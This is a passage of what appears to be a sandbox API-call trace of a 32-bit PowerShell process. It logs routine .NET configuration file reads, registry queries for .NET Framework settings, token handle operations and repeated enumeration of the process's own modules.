lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0116.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x44, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0116.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0116.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x44, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0116.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0decc) returned 1 [0116.732] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5a0e190 | out: lpFileInformation=0x5a0e190*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0116.732] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0dec8) returned 1 [0116.829] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x5a0e05c | out: pfEnabled=0x5a0e05c) returned 0x0 [0116.847] GetFileSize (in: hFile=0x420, lpFileSizeHigh=0x5a0e9a8 | out: lpFileSizeHigh=0x5a0e9a8*=0x0) returned 0x8c8e [0116.848] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e964, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e964*=0x1000, lpOverlapped=0x0) returned 1 [0116.869] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e814, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e814*=0x1000, lpOverlapped=0x0) returned 1 [0116.871] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e6c8*=0x1000, lpOverlapped=0x0) returned 1 [0116.872] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e6c8*=0x1000, lpOverlapped=0x0) returned 1 [0116.872] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e6c8, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e6c8*=0x1000, lpOverlapped=0x0) returned 1 [0116.873] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e600, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e600*=0x1000, lpOverlapped=0x0) returned 1 [0116.880] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e76c, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e76c*=0x1000, lpOverlapped=0x0) returned 1 [0116.882] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e660, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e660*=0x1000, lpOverlapped=0x0) returned 1 [0116.882] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e660, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e660*=0xc8e, lpOverlapped=0x0) returned 1 [0116.883] ReadFile (in: hFile=0x420, lpBuffer=0x2ab4330, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e724, lpOverlapped=0x0 | out: lpBuffer=0x2ab4330*, lpNumberOfBytesRead=0x5a0e724*=0x0, lpOverlapped=0x0) returned 1 [0116.883] CloseHandle (hObject=0x420) returned 1 [0116.883] CloseHandle (hObject=0x41c) returned 1 [0116.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x5a0e678, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0116.884] CoTaskMemAlloc (cb=0x20c) returned 0x62eea0 [0116.884] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x62eea0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0116.884] CoTaskMemFree (pv=0x62eea0) [0116.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0116.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0116.884] GetCurrentProcess () returned 0xffffffff [0116.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0eb00 | out: TokenHandle=0x5a0eb00*=0x41c) returned 1 [0116.885] CloseHandle (hObject=0x41c) returned 1 [0116.886] GetCurrentProcess () returned 0xffffffff [0116.886] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0eb00 | out: TokenHandle=0x5a0eb00*=0x41c) returned 1 [0116.890] CloseHandle (hObject=0x41c) returned 1 [0116.892] GetCurrentProcess () returned 0xffffffff [0116.892] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e9b4 | out: TokenHandle=0x5a0e9b4*=0x41c) returned 1 [0116.893] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x5a0e9ac | out: lpFileInformation=0x5a0e9ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0116.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0116.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0116.894] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x5a0e9b4 | out: lpFileInformation=0x5a0e9b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0116.895] CloseHandle (hObject=0x41c) returned 1 [0116.895] GetCurrentProcess () returned 0xffffffff [0116.895] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0eb00 | out: TokenHandle=0x5a0eb00*=0x41c) returned 1 [0116.896] CloseHandle (hObject=0x41c) returned 1 [0116.897] GetCurrentProcess () returned 0xffffffff [0116.897] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0eb00 | out: TokenHandle=0x5a0eb00*=0x41c) returned 1 [0116.898] CloseHandle (hObject=0x41c) returned 1 [0116.913] GetCurrentProcess () returned 0xffffffff [0116.913] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e918 | out: TokenHandle=0x5a0e918*=0x41c) returned 1 [0116.941] CloseHandle (hObject=0x41c) returned 1 [0116.942] GetCurrentProcess () returned 0xffffffff [0116.942] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e930 | out: TokenHandle=0x5a0e930*=0x41c) returned 1 [0116.944] CloseHandle (hObject=0x41c) returned 1 [0116.967] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x41c [0116.967] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x420 [0116.973] GetCurrentProcess () returned 0xffffffff [0116.973] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e910 | out: TokenHandle=0x5a0e910*=0x438) returned 1 [0116.977] CloseHandle (hObject=0x438) returned 1 [0116.978] GetCurrentProcess () returned 0xffffffff [0116.978] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e928 | out: TokenHandle=0x5a0e928*=0x438) returned 1 [0116.978] CloseHandle (hObject=0x438) returned 1 [0116.985] GetCurrentProcess () returned 0xffffffff [0116.986] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e918 | out: TokenHandle=0x5a0e918*=0x438) returned 1 [0116.993] CloseHandle (hObject=0x438) returned 1 [0116.994] GetCurrentProcess () returned 0xffffffff [0116.994] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e930 | out: TokenHandle=0x5a0e930*=0x438) returned 1 [0116.994] CloseHandle (hObject=0x438) returned 1 [0117.022] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0de04 | out: phkResult=0x5a0de04*=0x438) returned 0x0 [0117.023] RegQueryValueExW (in: hKey=0x438, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5a0de24, lpData=0x0, lpcbData=0x5a0de20*=0x0 | out: lpType=0x5a0de24*=0x1, lpData=0x0, lpcbData=0x5a0de20*=0xe) returned 0x0 [0117.023] RegQueryValueExW (in: hKey=0x438, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5a0de24, lpData=0x2ad5148, lpcbData=0x5a0de20*=0xe | out: lpType=0x5a0de24*=0x1, lpData="Client", lpcbData=0x5a0de20*=0xe) returned 0x0 [0117.023] RegCloseKey (hKey=0x438) returned 0x0 [0117.028] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebcc | out: phkResult=0x5a0ebcc*=0x438) returned 0x0 [0117.029] RegQueryValueExW (in: hKey=0x438, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x5a0ebe8, lpData=0x0, lpcbData=0x5a0ebe4*=0x0 | out: lpType=0x5a0ebe8*=0x0, lpData=0x0, lpcbData=0x5a0ebe4*=0x0) returned 0x2 [0117.029] RegCloseKey (hKey=0x438) returned 0x0 [0117.032] GetCurrentProcessId () returned 0xf88 [0117.032] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x438 [0117.032] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ad5898, cb=0x100, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2ad5898, lpcbNeeded=0x5a0ebd8) returned 1 [0117.034] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ad59a4, cb=0x200, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2ad59a4, lpcbNeeded=0x5a0ebd8) returned 1 [0117.036] GetModuleInformation (in: hProcess=0x438, hModule=0x320000, lpmodinfo=0x2ad5be4, cb=0xc | out: lpmodinfo=0x2ad5be4*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0117.036] CoTaskMemAlloc (cb=0x804) returned 0x5bc9a48 [0117.036] GetModuleBaseNameW (in: hProcess=0x438, hModule=0x320000, lpBaseName=0x5bc9a48, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0117.037] CoTaskMemFree (pv=0x5bc9a48) [0117.037] CoTaskMemAlloc (cb=0x804) returned 0x5bc9a48 [0117.037] GetModuleFileNameExW (in: hProcess=0x438, hModule=0x320000, lpFilename=0x5bc9a48, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0117.037] CoTaskMemFree (pv=0x5bc9a48) [0117.037] CloseHandle (hObject=0x438) returned 1 [0117.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0117.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0117.038] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseHttpPipeliningAndBufferPooling", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x0) returned 0x2 [0117.039] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x438) returned 0x0 [0117.039] RegQueryValueExW (in: hKey=0x438, lpValueName="UseHttpPipeliningAndBufferPooling", lpReserved=0x0, lpType=0x5a0ebec, lpData=0x0, lpcbData=0x5a0ebe8*=0x0 | out: lpType=0x5a0ebec*=0x0, lpData=0x0, lpcbData=0x5a0ebe8*=0x0) returned 0x2 [0117.039] RegCloseKey (hKey=0x438) returned 0x0 [0117.040] GetCurrentProcessId () returned 0xf88 [0117.040] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x438 [0117.040] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ad84d8, cb=0x100, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2ad84d8, lpcbNeeded=0x5a0ebd8) returned 1 [0117.042] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ad85f0, cb=0x200, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2ad85f0, lpcbNeeded=0x5a0ebd8) returned 1 [0117.044] GetModuleInformation (in: hProcess=0x438, hModule=0x320000, lpmodinfo=0x2ad8830, cb=0xc | out: lpmodinfo=0x2ad8830*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0117.044] CoTaskMemAlloc (cb=0x804) returned 0x5bc9a48 [0117.044] GetModuleBaseNameW (in: hProcess=0x438, hModule=0x320000, lpBaseName=0x5bc9a48, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0117.044] CoTaskMemFree (pv=0x5bc9a48) [0117.044] CoTaskMemAlloc (cb=0x804) returned 0x5bc9a48 [0117.044] GetModuleFileNameExW (in: hProcess=0x438, hModule=0x320000, lpFilename=0x5bc9a48, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0117.045] CoTaskMemFree (pv=0x5bc9a48) [0117.045] CloseHandle (hObject=0x438) returned 1 [0117.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0117.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0117.046] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseSafeSynchronousClose", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x0) returned 0x2 [0117.046] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x438) returned 0x0 [0117.046] RegQueryValueExW (in: hKey=0x438, lpValueName="UseSafeSynchronousClose", lpReserved=0x0, lpType=0x5a0ebec, lpData=0x0, lpcbData=0x5a0ebe8*=0x0 | out: lpType=0x5a0ebec*=0x0, lpData=0x0, lpcbData=0x5a0ebe8*=0x0) returned 0x2 [0117.046] RegCloseKey (hKey=0x438) returned 0x0 [0117.047] GetCurrentProcessId () returned 0xf88 [0117.047] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x438 [0117.047] EnumProcessModules (in: hProcess=0x438, lphModule=0x2adb144, cb=0x100, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2adb144, lpcbNeeded=0x5a0ebd8) returned 1 [0117.049] EnumProcessModules (in: hProcess=0x438, lphModule=0x2adb250, cb=0x200, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2adb250, lpcbNeeded=0x5a0ebd8) returned 1 [0117.051] GetModuleInformation (in: hProcess=0x438, hModule=0x320000, lpmodinfo=0x2adb490, cb=0xc | out: lpmodinfo=0x2adb490*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0117.051] CoTaskMemAlloc (cb=0x804) returned 0x5bc9a48 [0117.051] GetModuleBaseNameW (in: hProcess=0x438, hModule=0x320000, lpBaseName=0x5bc9a48, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0117.051] CoTaskMemFree (pv=0x5bc9a48) [0117.052] CoTaskMemAlloc (cb=0x804) returned 0x5bc9a48 [0117.052] GetModuleFileNameExW (in: hProcess=0x438, hModule=0x320000, lpFilename=0x5bc9a48, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0117.052] CoTaskMemFree (pv=0x5bc9a48) [0117.052] CloseHandle (hObject=0x438) returned 1 [0117.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0117.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0117.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.UseStrictRfcInterimResponseHandling", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x0) returned 0x2 [0117.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x438) returned 0x0 [0117.053] RegQueryValueExW (in: hKey=0x438, lpValueName="UseStrictRfcInterimResponseHandling", lpReserved=0x0, lpType=0x5a0ebec, lpData=0x0, lpcbData=0x5a0ebe8*=0x0 | out: lpType=0x5a0ebec*=0x0, lpData=0x0, lpcbData=0x5a0ebe8*=0x0) returned 0x2 [0117.054] RegCloseKey (hKey=0x438) returned 0x0 [0117.054] GetCurrentProcessId () returned 0xf88 [0117.054] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x438 [0117.054] EnumProcessModules (in: hProcess=0x438, lphModule=0x2addd84, cb=0x100, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2addd84, lpcbNeeded=0x5a0ebd8) returned 1 [0117.056] EnumProcessModules (in: hProcess=0x438, lphModule=0x2adde90, cb=0x200, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2adde90, lpcbNeeded=0x5a0ebd8) returned 1 [0117.058] GetModuleInformation (in: hProcess=0x438, hModule=0x320000, lpmodinfo=0x2ade0d0, cb=0xc | out: lpmodinfo=0x2ade0d0*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0117.058] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.058] GetModuleBaseNameW (in: hProcess=0x438, hModule=0x320000, lpBaseName=0x5bdb6f8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0117.059] CoTaskMemFree (pv=0x5bdb6f8) [0117.059] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.059] GetModuleFileNameExW (in: hProcess=0x438, hModule=0x320000, lpFilename=0x5bdb6f8, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0117.059] CoTaskMemFree (pv=0x5bdb6f8) [0117.059] CloseHandle (hObject=0x438) returned 1 [0117.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0117.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0117.060] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowDangerousUnicodeDecompositions", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x0) returned 0x2 [0117.060] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x438) returned 0x0 [0117.060] RegQueryValueExW (in: hKey=0x438, lpValueName="AllowDangerousUnicodeDecompositions", lpReserved=0x0, lpType=0x5a0ebec, lpData=0x0, lpcbData=0x5a0ebe8*=0x0 | out: lpType=0x5a0ebec*=0x0, lpData=0x0, lpcbData=0x5a0ebe8*=0x0) returned 0x2 [0117.061] RegCloseKey (hKey=0x438) returned 0x0 [0117.061] GetCurrentProcessId () returned 0xf88 [0117.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x438 [0117.062] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ae0950, cb=0x100, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2ae0950, lpcbNeeded=0x5a0ebd8) returned 1 [0117.063] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ae0a5c, cb=0x200, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2ae0a5c, lpcbNeeded=0x5a0ebd8) returned 1 [0117.065] GetModuleInformation (in: hProcess=0x438, hModule=0x320000, lpmodinfo=0x2ae0c9c, cb=0xc | out: lpmodinfo=0x2ae0c9c*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0117.065] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.065] GetModuleBaseNameW (in: hProcess=0x438, hModule=0x320000, lpBaseName=0x5bdb6f8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0117.066] CoTaskMemFree (pv=0x5bdb6f8) [0117.066] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.066] GetModuleFileNameExW (in: hProcess=0x438, hModule=0x320000, lpFilename=0x5bdb6f8, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0117.066] CoTaskMemFree (pv=0x5bdb6f8) [0117.066] CloseHandle (hObject=0x438) returned 1 [0117.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0117.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0117.067] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.UseStrictIPv6AddressParsing", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x0) returned 0x2 [0117.067] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x438) returned 0x0 [0117.068] RegQueryValueExW (in: hKey=0x438, lpValueName="UseStrictIPv6AddressParsing", lpReserved=0x0, lpType=0x5a0ebec, lpData=0x0, lpcbData=0x5a0ebe8*=0x0 | out: lpType=0x5a0ebec*=0x0, lpData=0x0, lpcbData=0x5a0ebe8*=0x0) returned 0x2 [0117.068] RegCloseKey (hKey=0x438) returned 0x0 [0117.068] GetCurrentProcessId () returned 0xf88 [0117.069] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x438 [0117.069] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ae34f4, cb=0x100, lpcbNeeded=0x5a0ebd8 | out: 